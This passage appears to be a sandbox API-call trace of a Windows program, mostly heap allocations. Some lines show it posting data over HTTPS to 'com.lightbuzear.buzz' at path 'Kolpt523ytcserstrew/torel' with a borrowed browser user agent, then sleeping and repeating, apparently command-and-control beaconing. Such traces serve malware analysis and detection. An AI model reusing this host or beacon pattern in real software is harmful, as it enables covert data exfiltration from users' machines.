lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0299.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815638 [0299.153] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f200 | out: hHeap=0x4780000) returned 1 [0299.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0299.153] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0299.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815638 [0299.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eedd0 [0299.154] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eedd0 | out: hHeap=0x4780000) returned 1 [0299.154] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0299.154] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0299.155] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0299.155] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0299.155] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0299.155] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0299.155] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0299.155] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0299.155] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0299.155] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0299.155] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0299.155] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4888 [0299.156] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0299.156] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c960 [0299.156] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4888 | out: hHeap=0x4780000) returned 1 [0299.156] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0299.156] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c960 | out: hHeap=0x4780000) returned 1 [0299.156] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eeee8 [0299.156] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0299.156] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd30 [0299.156] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeee8 | out: hHeap=0x4780000) returned 1 [0299.156] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eebc8 [0299.156] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0299.156] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec68 [0299.157] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0299.157] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0299.157] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0299.157] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0299.157] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eec68 | out: hHeap=0x4780000) returned 1 [0299.158] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0299.158] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0299.158] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0299.158] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0299.158] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0299.158] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0299.158] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0299.158] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6f0 [0299.158] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0299.158] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4888 [0299.158] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0299.158] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c9f0 [0299.158] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4888 | out: hHeap=0x4780000) returned 1 [0299.158] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0299.158] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c9f0 | out: hHeap=0x4780000) returned 1 [0299.158] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eeb28 [0299.158] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0299.158] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb940 [0299.159] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb28 | out: hHeap=0x4780000) returned 1 [0299.159] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeab0 [0299.159] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0299.159] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eecb8 [0299.159] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0299.159] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0299.159] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0299.160] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0300.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eecb8 | out: hHeap=0x4780000) returned 1 [0300.307] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0300.307] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0300.307] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0300.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0300.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0300.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0300.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0300.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0300.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0300.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0300.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0300.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0300.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4888 [0300.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0300.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ced0 [0300.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4888 | out: hHeap=0x4780000) returned 1 [0300.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0300.309] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ced0 | out: hHeap=0x4780000) returned 1 [0300.309] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eeb78 [0300.309] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0300.309] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0300.309] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb78 | out: hHeap=0x4780000) returned 1 [0300.309] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeee8 [0300.309] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0300.309] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eecb8 [0300.310] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0300.310] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0300.310] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0300.310] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0300.311] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eecb8 | out: hHeap=0x4780000) returned 1 [0300.311] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0300.311] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0300.311] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0300.311] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0300.312] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0300.312] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0300.312] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0300.312] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0300.312] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0300.312] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0300.312] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4888 [0300.312] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0300.312] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ccc0 [0300.312] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4888 | out: hHeap=0x4780000) returned 1 [0300.312] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0300.312] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ccc0 | out: hHeap=0x4780000) returned 1 [0300.312] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eeb78 [0300.312] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0300.312] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0300.312] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb78 | out: hHeap=0x4780000) returned 1 [0300.312] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eef10 [0300.312] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0300.312] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeba0 [0300.313] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0300.314] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0300.314] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0300.314] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0300.314] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeba0 | out: hHeap=0x4780000) returned 1 [0300.314] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0300.314] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0300.314] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0300.315] FreeLibrary (hLibModule=0x71570000) returned 1 [0300.315] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0300.315] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0300.315] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed08 | out: hHeap=0x4780000) returned 1 [0300.315] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed58 | out: hHeap=0x4780000) returned 1 [0300.316] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eee98 | out: hHeap=0x4780000) returned 1 [0300.316] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb00 | out: hHeap=0x4780000) returned 1 [0300.316] Sleep (dwMilliseconds=0x2710) [0300.339] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0300.339] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0300.339] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0300.339] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0300.339] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0300.339] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0300.339] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0300.339] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0300.339] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0300.340] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480efa8 [0300.340] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0300.340] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f200 [0300.340] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480efa8 | out: hHeap=0x4780000) returned 1 [0300.340] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0300.340] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f200 | out: hHeap=0x4780000) returned 1 [0300.340] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f200 [0300.340] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeb00 [0300.341] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb00 | out: hHeap=0x4780000) returned 1 [0300.341] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0300.341] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec40 [0300.341] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0300.341] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0300.341] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0300.341] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0300.341] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6f0 [0300.342] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0300.342] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0300.342] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0300.342] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0300.342] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0300.342] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480efa8 [0300.342] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0300.342] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ec28 [0300.342] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480efa8 | out: hHeap=0x4780000) returned 1 [0300.342] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0300.342] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0300.342] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eee48 [0300.342] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0300.342] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0300.342] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eee48 | out: hHeap=0x4780000) returned 1 [0300.342] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec68 [0300.342] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0300.342] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeb00 [0300.343] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0300.343] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0300.344] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0300.344] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0300.344] FreeLibrary (hLibModule=0x71780000) returned 1 [0300.344] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb00 | out: hHeap=0x4780000) returned 1 [0300.344] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0300.344] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeda8 [0300.344] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0300.345] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0300.345] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0300.345] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0300.345] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0300.345] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0300.345] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0300.345] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0300.345] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0300.345] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0300.345] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480efa8 [0300.345] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0300.345] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4888 [0300.345] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480efa8 | out: hHeap=0x4780000) returned 1 [0300.345] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0300.345] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4888 | out: hHeap=0x4780000) returned 1 [0300.345] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f4888 [0300.345] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eedd0 [0300.346] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eedd0 | out: hHeap=0x4780000) returned 1 [0300.346] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0300.346] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec90 [0300.346] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0300.346] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeb78 [0300.346] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0300.347] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0300.347] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0300.347] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0300.347] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0300.347] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0300.347] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0300.347] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6f0 [0300.347] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0300.347] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480efa8 [0300.347] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0300.347] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c978 [0300.347] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480efa8 | out: hHeap=0x4780000) returned 1 [0300.347] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0300.347] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c978 | out: hHeap=0x4780000) returned 1 [0300.347] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480efa8 [0300.347] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eecb8 [0300.348] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eecb8 | out: hHeap=0x4780000) returned 1 [0300.348] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0300.348] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0300.348] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0300.348] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0300.348] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0300.348] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6f0 [0300.349] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0300.349] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0300.349] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0300.349] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0300.349] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0300.349] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c960 [0300.349] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0300.349] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ca80 [0300.349] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c960 | out: hHeap=0x4780000) returned 1 [0300.349] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0300.349] HeapFree (in: hHeap=0x4780000, 